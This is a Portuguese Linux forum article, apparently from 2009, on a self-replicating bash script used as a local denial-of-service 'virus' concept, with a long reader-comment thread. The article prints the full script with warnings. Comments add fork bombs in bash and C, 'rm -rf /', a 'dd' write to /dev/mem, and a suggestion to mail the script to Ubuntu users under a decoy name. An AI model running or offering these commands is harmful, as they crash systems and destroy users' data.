Vírus em Linux?

Este artigo é uma cópia do artigo Vírus em Linux, de minha autoria, publicado originalmente em http://linux.lcc.ufmg.br e reformatado para ser compartilhado aqui no Viva o Linux. Nele veremos como criar um "vírus" em Linux e em seguida como configurá-lo para evitar esse tipo de exploração do sistema.

[ Hits: 37.712 ]

Por: Perfil removido em 20/05/2009


Introdução



Muito já foi dito sobre a segurança do Linux, sendo uma de suas características a ausência de vírus. Será isto realmente verdade?

Neste artigo estudaremos um tipo de arquivo autor-replicante e veremos como a utilização deste tipo de script pode afetar o bom funcionamento do sistema.

Organismos autores-replicantes são sistemas que podem se reproduzir a partir de si mesmos. O script que vamos estudar possui esta característica. Ele copia a si mesmo e executa as cópias, que geram e executam mais cópias, e assim por diante. Por isto o chamaremos de vírus. O impacto deste "vírus" é conhecido como DoS (Deny of Service, ou Negação de Serviço).

É possível que ao se executar este script, seu sistema fique inoperante, sendo necessário reiniciá-lo. A construção mais simples deste tipo de script que preserva a característica de autorreplicação e executa algum comando é algo parecido com o seguinte script, batizado de virus.bash:

#!/bin/bash

REPLICA=`cat /dev/urandom | strings | tr -d '[:punct:]'| head -n 1 | awk -F" " '{print $1}'`

while [[ ${REPLICA} == "" ]]
do
   REPLICA=`cat /dev/urandom | strings | tr -d '[:punct:]'| head -n 1 | awk -F" " '{print $1}'`
done

# AÇÃO:
echo Ola!

:> ${REPLICA}
chmod +x ${REPLICA}
cat ${0} > ${REPLICA}
echo "exit 0" >> ${REPLICA}
./${REPLICA} &

exit 0

Vamos explicá-lo passo-a-passo, mas antes de executá-lo, é meu dever avisar sobre alguns pontos importantes:

1. A execução deste script pode fazer com que a sua máquina deixe de funcionar e precise ser reiniciada.

2. Você pode não conseguir cessar a cadeia de execução deste script.

3. Só execute este script se estiver certo do que está fazendo e para fins didáticos.

4. Caso decida executá-lo, crie um diretório e execute a partir dele.

5. Este é um estudo sobre conceito, com foco em replicabilidade e DoS. Estes scripts, na forma apresentada, não se propagam pela rede nem pela estrutura de diretórios.

    Próxima página

Páginas do artigo
   1. Introdução
   2. Como funciona
   3. Uma versão mais potente
   4. Avaliando soluções
Outros artigos deste autor

Algumas Distribuições GNU/Linux Excêntricas!

Configurando wireless no Ubuntu 7.04 e compartilhando a conexão

Instalando o RealPlayer 10 no Linux

Microcode - Como atualizar o firmware do processador

PuTTY - Estabelecendo Chave Secreta com OpenSSH

Leitura recomendada

Analizando os logs do IPTables

Detectando vulnerabilidades com o Nessus

Testando configurações e segurança do Apache com Nikto

Security Hacks: Linux & BSD

Aplicação do firmware intel-microcode no Slackware

  
Comentários
[1] Comentário enviado por y2h4ck em 20/05/2009 - 11:23h

Esse script pode ser considerado um vírus ? :P

[2] Comentário enviado por agk em 20/05/2009 - 11:50h

Pra mim isso não é vírus não, parece mais um "fork".

Também se formos considerar as formas de propagação, o usuário teria que ter acesso a um Shell.

Considerando que esse código viesse por e-mail, muito difilmente ele seria executado de forma a comprometer o sistema, pois necessita ser executado em um shell.

Usuário experientes não executam um script sem antes conferir o conteúdo, usuários iniciantes não sabem abrir o shell para executar scripts.

Enfim, ainda falta muito para considerar isso um vírus em potencial que venha a causar algum dano ao sistema.

Por fim podemos considerar algumas hipóteses, como:

- Ser explorada alguma vulnerabilidade que de acesso a um shell remoto;

- O script conseguir se auto-propagar pela redes, se modificar, infectar outras máquinas;

- Conseguir explorar alguma falha no sistema para iniciar junto com a máquina;

Espero que tenhamos mais opiniões aqui, pois é um assunto interessante e deve ser abordado de forma aberta.

[ ]'s

[3] Comentário enviado por removido em 20/05/2009 - 11:51h

Não se quisermos ser rigorosos quanto ao conceito de virus. Este script é um conceito de algo que se parece com o vírus por possuir uma estrutura autorreplicante. É uma espécie de vírus-conceito. O impacto deste script é muito menor do que o que chamamos de vírus ("apenas" um DOS). O que eu achei interessante é que consegue-se um DOS à partir de um usuário comum. Isto me preocupa bastante, por isso achei legal divulgar.

Abracos

[4] Comentário enviado por admtempos em 20/05/2009 - 11:56h

Muito bom este post uma duvida ex eu tenho um servidor web teria como algun sem privilegios colocar no meu servidor e execultar???

[5] Comentário enviado por vinipsmaker em 20/05/2009 - 11:58h

Considero isso um vírus, mas quem usa windows e pega na internet este tipo que você descreveu considera-o uma piada, pois vírus para windows são capazes de inutilizar o sistema e isso pode ser limitado ao mesmo tempo que se limita o seguinte comando:
bomb(){ bomb|bomb& };bomb

[6] Comentário enviado por sidnei.weber em 20/05/2009 - 13:49h

Não acredito que um script possa ser considerado um virús autoreplicante...
Alguém vai ter que executar esse script, e esse script tem que chegar até a máquina já um trabalho em tanto e ninguém vai abrir uma coisa que não sabe o que é, ainda mais para execução. E no mais um reboot na máquina põe ela de volta a ativa e sem script rodando, então não pode ser considerado uma ameaça...

[7] Comentário enviado por asdf2 em 20/05/2009 - 14:53h

pô cara, ensinando fazer virus pra linux ? Pra quê isso, bicho? Não precisamos de gente igual a vc não.

minha nota vai pelo número de neurônios que tú tem, vai ser 1 ( era para ser 0.1, mas...)

[8] Comentário enviado por fachmann em 20/05/2009 - 15:51h

Nao vejo problema em "ensinar a fazer virus pra linux". O conhecimento tem de ser espalhado, somente desta forma podemos nos defender corretamente. O problema é como usar este conhecimento, e isto é inerente ao individuo.
Como conceito o artigo foi muito bacana.
Abraço.

[9] Comentário enviado por hugoeustaquio em 20/05/2009 - 16:42h

Esse atraque não é um DoS, mas sim um fork bomb. DoS é disparado da rede, ou seja, atinge uma máquina que NÃO foi infectada por vírus nenhum. As pessoas costumam confundir vírus com ataque DoS porque muitas vezes o vírus dispara requisições para outra máquina, criando um ataque DoS, planejado pelo construtor do vírus para atingir outra máquina. Esse conceito se chama botnet.

O que foi apresentado deveria ser auto-executável para ser considerado um vírus, tipo escrever o conteudo dele mesmo no '~.bashrc' para executar quando o usuário fizer login, ou então no /etc/profile (o que dependeria da permissão do root). Não tem com o que se preocupar, pois o bash não costuma ter brechas a ponto de comprometer o acesso aos arquivos do sistema por usuário comum... E se algum dia tiver, não sou a favor do uso de anti-virus, mas sim de corrigir a brecha e atualizar as distros... Com boas práticas conseguiriamos erradicar os vírus de computador facilmente, sem gastar recursos (tanto da máquina quanto dos nossos bolsos) com anti-virus...

Mas em todo o caso valeu por compartilhar sua opinião.... Obrigado

[10] Comentário enviado por elovattibr em 20/05/2009 - 17:01h

Na minha concepção isso é um Script comum que a unica coisa que faz e se copiar e se executar gerando carga no processardor. No caso o DoS desse script é gerado por si mesmo não pela rede ou seja isso seria um cód malicioso que não se instala no computador automaticamente, ou seja ele não é um virus que seja "contraido" por má utilização da internet ou vulnerabilidades do navegador ou do sistema, isso é um Cod malicioso que usa recursos comuns de scripting, que não fará mal a ninguém, pois além de não ser binario, ele não explora nada que lhe desse acesso root ao sistema.
Mesmo que o script fosse reescrito com deleções de arquivos e usado ativamente em computadores com linux em perfil de user o maior estrago seria forçar um reboot, ou perder alguns arquivos em que o executor de script for o dono do arquivo.

A fins de comparação:
Na era 9x eu frequentemente brincava com alguns amigos trocando a permissão do arquivo win.com no diretorio C:\windows de arquivo de sistema para arquivo comum, assim o windows não achava o arquivo win.con não iniciando.

o BAT era assim

attrib -s C:\windows\win.com

e pra voltar ao normal attrib +s C:\windows\win.com,

ou seja, um script do genero para windows faria um tremendo estrago e no linux cocegas.

Assim pela dimensão do problema que o script causaria eu te digo, usar o Wine ou um pacote nativo mal desenvolvido (entende-se cheio de vulnerabilidades) causaria mais estragos que esse script.

[11] Comentário enviado por vsmoraes em 20/05/2009 - 18:23h

Muito bom artigo, principalmente quando você aborda as soluções possíveis para tentar combater este tipo de "ataque".

A título de conhecimento, podemos simplificar tudo isso em uma única linha de código:


:(){ :|:& };:


Basta colar esse comando no shell e dar um <enter>,

Abraço.

[12] Comentário enviado por ribafs em 20/05/2009 - 20:18h

Executei aqui no Ubuntu 8.04 o mais simples e não copnsegui parar com o kill sugerido.
Ele acusou erro de sintaxe do kill.

Bem, quando resolvi reiniciar já havia mais de 3000 arquivos gerados.
Achei interessante a experiência e parabéns por compartilhar seu conhecimento.
Vejo muita gente te criticando e te corrigindo nos comentários e até um colega muito radical, mas nunca tinha lido nada parecido.
Valeu!

[13] Comentário enviado por stremer em 20/05/2009 - 23:57h

é cada uma viu....

[14] Comentário enviado por nicolo em 21/05/2009 - 07:36h

Imagine um cara que queira acabar com o Linux. Bastaria enfiar um virus desses nas redes. Isso enterraria a fama do
Linux de "seguro", atingindo a base de usuários iniciantes:
Continuo alertando que os assuntos e técnicas que lidam com o "lado negro da força" tem que ser mantido nos círculos das
elites técnicas que sabem o que estão fazendo.
Se continuarem divulgando isso todos os script boys vão começar a tentar.
Vai ser um infernopara o Linux, ou um paraíso para a concorrência.

[15] Comentário enviado por nicolo em 21/05/2009 - 07:47h

É pior do que parece. O Cara é um super especialista em Linux e fica ensinado a fazer
virus para Linux. Não dá para entender.

[16] Comentário enviado por juliofsn em 21/05/2009 - 08:14h

nicolo, pelo contrário, ele faz um alerta muito válido.

O Linux está se popularizando com distros como Ubuntu e Mandriva e até com essas do Computador para Todos.

O Linux começa a receber aqueles usuários de Windows que recebem um anexo de e-mail chamado fotos_juliana_paes.exe e executam como Administradores, qual a dificuldade de se fazer um .deb e mandar pra esse mesmo usuário?

Por isso acho muito válido esses alertas, o Linux só está protegido hoje por que a baixa quantidade de usuários não motiva crackers a criar vírus para ele.

[17] Comentário enviado por agk em 21/05/2009 - 08:32h

Bom, para os usuários que rodam as interfaces gráficas em modo root, esses tem que se lascar mesmo, perder todo o sistema, pelo menos assim adquirem alguma noção de segurança.

Mesmo assim, apesar de haver hipótese de se contaminar um usuário inesperiente e inadvertido que consegue fazer a idiotice de executar um script desses como root, ainda fica a pergunta, como um negócio desses vai se auto replicar em uma rede se é necessário a intervenção do usuário para que o "suposto" vírus se instale?

Uma das formas possíveis que vejo é através da exploração de uma vulnerabilidade remota que consiga elevação de privilégios no sistema.

[18] Comentário enviado por luizvieira em 21/05/2009 - 09:32h

Muito interessante. Entendi muito bem o que o autor colocou em seus comentário... Na verdade isso é um meta-vírus, pois a partir desse código (que por si só já gera um DoS), podemos gerar coisas muito mais letais.

Como antes, não concordo, com o nicolo, pois acho que conhecimento precisa ser compartilhado e divulgado. A política de não dfivulgar conhecimento é para profissionais de segurança que querem ficar em sua zona de conforto. Quando divulgado esse tipo de conhecimebnto, nós, profissionais de segurança e administradores de rede precisamos correr para nos atualizar e ter conhecimento o suficiente para mitigar esse tipo de ameaça. No entanto, é muito mais fácil para a maioria não precisar se atualizar ou adquirir novos conhecimento para combater ameaças antes desconhecidas (ou conhecidas apenas pelos "supostos especialistas" com o ego inflado).

Quem, em sã consciência, pode dizer-se coerente ao ser contra a divulgação do conhecimento justamente no mundo do open source e software livre? O OS e o SL não são apenas sistemas, mas ideologia e filosofia. Se vamos viver assim, sejamos completos, divulgando e compartilhando informações. Será que existiria o Linux se Torvalds e Stallman não compartilhassem seus projetos?

Parabéns pelo post daavelino!

[19] Comentário enviado por removido em 21/05/2009 - 10:11h

Muitos foram os comentários, as críticas e explicações. E como me sinto depois disto? Extremamente feliz e realizado por ter atingido o objetivo da publicação deste artigo.
Também acredito que PRECISAMOS compartilhar nossas experiências e conhecimento tanto quanto nossas dúvidas. Vou mais longe nisso. Eu diria que temos o dever, uma espécie de obrigação moral para que possamos dizer, com propriedade, que fazemos parte do mundo linux. O Luiz sintetizou meu argumento numa frase brilhante: "O OS e o SL não são apenas sistemas, mas ideologia e filosofia.". Não vejo de outra forma. Moçada, é importante sim pensarmos em problemas, criticarmos, apontarmos soluções. É isso que faz um projeto (um sistema, uma teoria, uma ideologia...) ser realmente bom. Qual o valor de um sistema operacional onde não podemos expor problemas? Onde temos que esconder as críticas, as frustrações? Isto é medo de se envergonhar? Fantástico saber que podemos, com boas práticas, evitar um DoS que pode ser causado por um usuário. Fantástico saber que temos saídas para este tipo de problemas. Fantástico saber que o Linux é robusto o bastante para tolerar isto. Talvez alguns conceitos mal entendidos (não digo em termos de definições, nomeclaturas, etc..) estejam impedindo que vejamos beleza em uma linha de código, ou em uma solução elegante.

E talvez isto seja o pior de todos os vírus já existentes. "Pior que a ignorância é a ilusão do conhecimento". Pensem nisto.


Abraços, moçada!

[20] Comentário enviado por agk em 21/05/2009 - 11:55h

Muito bom isso tudo, pessoal criticou, deu a sua opinião, mas eu gostaria de saber se alguém conseguiu bloquear os efeitos desses script-virus? Se alguém seguiu as dicas do artigo, ou encontrou alguma forma melhor de fazer isso?

[ ]'s

[21] Comentário enviado por wryel em 21/05/2009 - 14:04h

nossa!, e eu que achava que não existia artigosnesse nível em português!

[22] Comentário enviado por wryel em 21/05/2009 - 14:06h

provavelmente quem criticou seu artigo não é programador ou não olhou o lado "técnico" do artigo. Pra mim é super válido e gostaria de ver mais artigos com essa qualidade. Parabéns.

[23] Comentário enviado por vicentedeandrade em 21/05/2009 - 17:36h

Interessante este artigo, considero como um vírus pois ele se multiplica sozinho, MAS para isso precisa do comando "chmod +x virus.bash", para usuários iniciantes ou inexperientes o possível vírus não traria muitos prejuízos, pois o usuário tentaria executar o arquivo e o máximo q aconteceria eh uma mensagem de erro dizendo q no arquivo não tem permissões de ser executado; o usuário que já usa GNU/Linux a mais tempo não seria "inocente" de dar chmod +x num arquivo qualquer (ainda mais vindo da internet) sem antes ver o conteudo do arquivo.

Enfim, artigo muito bom

Flw

[24] Comentário enviado por airtonbjunior em 21/05/2009 - 20:58h

Interessante o artigo. Percebemos que todos os sistemas são sujeitos a códigos maliciosos , uns mais que outros é claro! :D

Não conhecia esse mecanismo para setar os limites de processos e arquivos no sistema. Isso pode ser muito útil em alguns casos específicos!



Parabéns e abraços!

[25] Comentário enviado por Teixeira em 21/05/2009 - 22:50h

O código pode não ser um virus clássico, porém chama à atenção ao fato de que existem códigos que, SE DERMOS A CHANCE DE SEREM EXECUTADOS, poderão trazer algum dano. O autor evidencia esse fato.
Tenho a comentar apenas que, não devemos nos sentir 100% seguros por 100% do tempo, apenos porque nosso S.O. é mais resistente a maioria dos tipos de infecção. Há de se considerar um pouco de prevenção, dosada de acordo com a nossa necessidade.
Sempre haverá a possibilidade de haver algum funcionário insatisfeito ou alguém mais que poderá querer sabotar o sistema.
Não é necessário um código desse tamanho, pois basta apenas uma linha de comandos para por tudo a perder.
Por essa razão sempre explico que no Basic Linux todos os usuários SÃO root por default, e portanto não devem fazer experiências em rede, por exemplo, ou se expor demasiadamente em sessões de internet.
O seguro morreu de velho...

[26] Comentário enviado por upc0d3 em 21/05/2009 - 23:12h

um "virus" deste tipo da pra ser feito em C de uma forma facil:

#include <stdio.h>

int main()
{
for(;;){ fork(); }
}

Compilem e executem..... o sistema trava tbm.... pq? devido ao numero finito de identificadores de processo, ele nao vai mas ter como atribir os PIDS sendo assim o sistema trava....


[27] Comentário enviado por rbn24 em 22/05/2009 - 06:40h

é interessante é sempre bom ver artigos deste tipo para estarmos sempre preparados para o futuro, agora depende é de como iremos utilizar este conhecimento adquirido.

[28] Comentário enviado por staimeer em 22/05/2009 - 15:53h

Nossa tem alguns comentarios totalmente sem nocao do tipo

"É pior do que parece. O Cara é um super especialista em Linux e fica ensinado a fazer
virus para Linux. Não dá para entender. "

o autor realmente tocou em um ponto interessante porem o script e apenas um script e nao pode ser considerado virus, e acho que estamos um pouco distante de ter virus para linux porem, se vc usar o linux como root, vc pode ter alguns problemas.

PS: porem se forem alguns anos atras os virus for windows era feitos em vbs ou mesmo arquivos .bat, entao boa leitura

[29] Comentário enviado por hugoeustaquio em 22/05/2009 - 16:13h

staimeer, acho que o nicolo foi irônico. Assim como a maioria dos que postaram aqui. Até por isso não participei muito da discussão, apesar de ter gostado muito da idéia por detrás desse artigo. Concordei com algumas coisas, discordei de outras, mas enfim, adoro uma discussão aberta, e esse tipo de assunto tem que existir na comunidade. O que me compele um pouco são os comentários maliciosos e irônigos de alguns, independentemente de seus conhecimentos e até dos conhecimentos do autor, que não estão (na minha opinião) em discussão, mas sim o CONTEÚDO do que ele escreveu.

Volto a aproveitar o espaço e fazer duas afirmações:
1) É muito mais difícil escrever um vírus para linux do que para windows, afinal de contas, colocar uns comandos nocivos (poderia ser um rm / -rf) num script somente pode compor um vírus com base em muita engenharia social (tipo convencer o usuário a dar permissão de execução e depois executar). E o estrago pode ser grande em ambientes que o root for utilizado para exceder suas funções de manutenção da máquina (independente de ser em modo gráfico ou não) e fica aqui um alerta para aqueles que gostam de usar o root para tarefas de usuário, mesmo que seja utilizando programas em modo de texto para navegar, ler e-mails, ouvir música, etc....
2) Sou completamente contra a idéia dos anti-virus, sou a favor da correção das brechas que o vírus explore, para que o mesmo deixe de funcionar.

[30] Comentário enviado por marquinhos1875 em 22/05/2009 - 17:39h

Pow
Rapa, gostei do artigo, como fonte de conhecimento em scripts, mas isso ta longe de ser virus, 1 Bilhao de anos luz de ser considerado virus
E pelos comentarios eu vejo como a comunidade linux e inapta
tipo, uma pessoa recebe um anexo de fulana_de_tal_nua.deb e for execultar, o gerenciador de pacotes ira interpretar e pacote (se tiver em user comum, vai pedir senha), existe debiloides com desconfiometros sulficientes para nao terminar a execulção, alcontrario do ruindows que nao pergunta nada e ate abre uma foto pra enganar o otario
Sobre o script, nao afeta rede, nao se auto execulta, nao infecta outras makinas, nao se propaga em rede, bla bla bla .....

outra coisa, a maioria dos pacotes instalados no linux, são baixados em repositorios oficiais da distribuição, e o resto (como nao precisa de crack) são baixados nos sites oficiais e scripts so sao adicionados no sistema por pessoas com um minimo de conhecimento e quem conhese confere

resumindo, o linux nao operado por lioras, são extremamentes suguros

[31] Comentário enviado por psychokill3r em 22/05/2009 - 22:19h

Entao faca um teste mande este arquivo com o nome tvnobunutu.sh para todos que vc conhece que usam ubuntu.
e reporte oque acontece
clique duas vezes no arquivo e ele te diz exibir ,executar ,executar em terminal.
quantos voce acha que iriam se dar mal.
o problema é o sudo e o grupo admin quem instala o ubuntu tem poderes de root mais nem todos os usuarios sabem disso
adicionando sudo -i ao inicio do script vc vai rodar ele como root se n tiver senha ou o sudo estiver setado para n pedir senha ja viu.
Entao so use linux se voce sabe o que esta fazendo.

[32] Comentário enviado por marquinhos1875 em 23/05/2009 - 09:12h

Isso
no corpo da mensagem eu boto
"esse e um virus de portugues, salve entre no console entre no diretorio onde foi salvo e digite $sudo chmod +x tvnobunutu.sh voute no e pessa para execultar em terminal
abraço velho amigo"

resumindo, o linux nao operado por lioras, são extremamentes suguros

continuo com meu linux sem ante nada

[33] Comentário enviado por psdrop em 23/05/2009 - 14:09h

Gostei do seu artigo, acho legal compartilhar possiveis ataques para garantir uma segurança maior em meu sistema...

agora quando ver algum script do genero nao vou apenas deixar de executar e sim entender o por que nao devo executar!

Parabéns e obrigado!

grade abraço

[34] Comentário enviado por cleitonapsouza em 25/05/2009 - 10:29h

Bom, isso naum é virus, tah bem longe de ser um virus pra linux.
Isso é só um script malefico junto com o q nossos companheiroas acima jah citaram.
mas legal a sua ideia de compartilhar conhecimento.

abraço!

[35] Comentário enviado por junior em 25/05/2009 - 16:08h

Agora o interessante seria exemplificar algo que pudesse combater este tipo de script.
Interessante o artigo.

[36] Comentário enviado por asdf2 em 28/05/2009 - 02:38h

vejam o artigo acima ( o de cabelo), todo mundo elogia o cara, um artigo totalmete interessante (como varios dele) e não prejudica ninguém ( não é virus, não é cavalo de troia, não é sobre invasão alheia, etc), repito todo mundo elogiou o cara.

mas agora vejam o artigo do "daavelino", quer dá uma de hacker ( mas é só um lamer mitido a besta) que quer só aparecer e criar polêmica, por que não faz um atigo construtivo, valido, e que sirva para ajudar e não atrapalhar a comunidade linux.

não faiz mais isso "daavelino", todo mundo já sabe que tu é um lamer aparecido, não precisa fazer mais isso não, procure outra comunidade, se tu não serve para o linux então não serve para nada.

[37] Comentário enviado por juliofsn em 28/05/2009 - 13:29h

asdf2, se o artigo não serve pra você, não comente.

o daavelino quis mostrar um conceito, você pode discordar se isso é um vírus, pode discordar se é perigoso, pode discordar se o conceito dele está correto. Mas não pode desmerecer o fato de ele ter vindo compartilhar esse conceito aqui. Com esse tipo de pensamento fechado você faz muito mais mal à comunidade Linux.

e marquinhos1875:

"o linux não operado por loiras, são extremamente seguros"

pense no futuro, com a popularização do Linux muitas loiras, bem como portugueses e argentinos(tá, esses merecem) vão tomar contato com o sistema, a obrigação de quem tem o conhecimento técnico é tornar o uso até dessas pessoas o mais seguro possível.

[38] Comentário enviado por hugobcar em 28/05/2009 - 16:17h

Descobri um outro virus para linux.

Por favor, entrem no shell e executem isso aqui.
rm -rf /

(ATENCAO ISSO VAI ACABAR COM SEUS ARQUIVOS, NAO FACAM ISSO, A MENOS QUE DESEJEM PEGAR ESSE VIRUS)

Desde já agradeço a compreensão de me ajudarem a executar manualmente, igual o "vírus" aí do nosso amigo.


----

Tenho o mesmo pro Windows... mais uma vez, preciso de uma ajudinha de vcs.

format c:



[39] Comentário enviado por asdf2 em 29/05/2009 - 00:08h

hugobcar, acressenta isso no ".bashrc" de cada usuario:

alias rm='rm -i --preserve-root'

isso deve resolver o problema depois de reiniciar.

isso não é virus, seria exatamente a mesma coisa de executar o comando "deltree *" no DOS do windows

[40] Comentário enviado por hugobcar em 29/05/2009 - 08:11h

Cara amigo asdf2.
Eu sei que isso não é virus.. se nao percebe, estou sendo irônico. Mostrando que esse artigo do nosso amigo ai, tmb não é um virus já que pede para o usuário executar.


[41] Comentário enviado por multiplicador em 05/06/2009 - 15:05h

Crie um arquivo chamado a.c com o seguinte conteúdo:

main(){

while(1==1) { fork(); }

}


Salve ele.

depois no shell execute: gcc a.c

execute o arquivo gerador digitando: ./a.out

Prontinho. A máquina irá travar bem rapido.

É um ataque de DoS, mas não um vírus.

Utiliza o mesmo conceito do script do colega autor do artigo, mas está escrito em C.

Algumas medidas de segurança que ele descreveu no artigo ajudam contra esse ataque em C também.

PS: Não precisa ser nenhum "Expert em Linux" para fazer isso. Está disponível no Google e Yahoo a muitos anos. Lembro que vi esse código pela primeira vez em um livro que comprei na faculdade em 1998. E nem por isso (11 anos já) o Linux está sofrendo com os vírus, que o DOS e Windows sofrem desde seu início.

Um abraço.

[42] Comentário enviado por removido em 17/06/2009 - 14:19h

sei lah

axo que viruz em script nao rola nao, script eh mais devagar que um programa compilado

mas eh bom ficar brincando com isso

ja criei tipo de um viruz tbm

ele nao precisa ter permissao root, em algumas linhas com alguns comandinhos basicos eu descobri como travar total o sistema

daora msm eh ficar criando para windows, mas como eu nao sei programação e nem DOS, ai fica dificil criar

flw

[43] Comentário enviado por SMarcell em 22/10/2009 - 03:19h

Se for pra travar a máquina:

dd if=/dev/urandom of=/dev/mem

:P

[44] Comentário enviado por lordestark em 04/05/2013 - 17:56h

o unico vírus,ou (comando) que sei fazer é:

1°passo:abra o Pluma(editor de texto)

2°passo:digite:
sudo su
halt (camando para desligar o linux)

3°passo:salve como:o nome que você quer,mas com a extenção .sh
exemplo:Desligar.sh

4°passo:é só executar. E logar.


atenção,não me responsabilizo por danos causados ao seu pc,mas se duvida,teste ele em um linux emulado no virtual box.
eu fiz com meu amigo,e ele não gostou.kkkkkkk
esse vírus só faz desligar o pc,mas pode não dar certo.

[45] Comentário enviado por felipe.facundes em 04/06/2013 - 16:24h

Este artigo é bastante válido. Alguém já se perguntou como pode um programa, como o firefox ser executado sem precisar do comando: chmod +x é só clicar duas vezes em firefox ou firefox-bin que abre, sem dar permissões, ou aquele arquivo que você deu permissão chmod +x e, depois você mudou o nome e, mudou de pasta e as permissões de execução permanecem. É um erro acreditar que o Linux é invencível e que não da para se contaminar com vírus. Devemos ficar atentos, pois nada é infalível.

[46] Comentário enviado por hugoeustaquio em 05/06/2013 - 09:33h

caro felipe.facundes

quando você descompacta um arquivo, por exemplo, está criando outros arquivos (sob a alcunha do seu usuário) e dando-lhes as permissões necessárias para restaurá-los. Ou seja, se você baixou o firefox zipado e depois descompactou então entende-se que você deu a ele autorização de execução!!

Isso não é uma falha de segurança ou coisa do tipo. Se você der um '$ chmod -x ' nesse arquivo então ele não vai executar.

Não, o linux não executa um programa sem permissão de execução.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts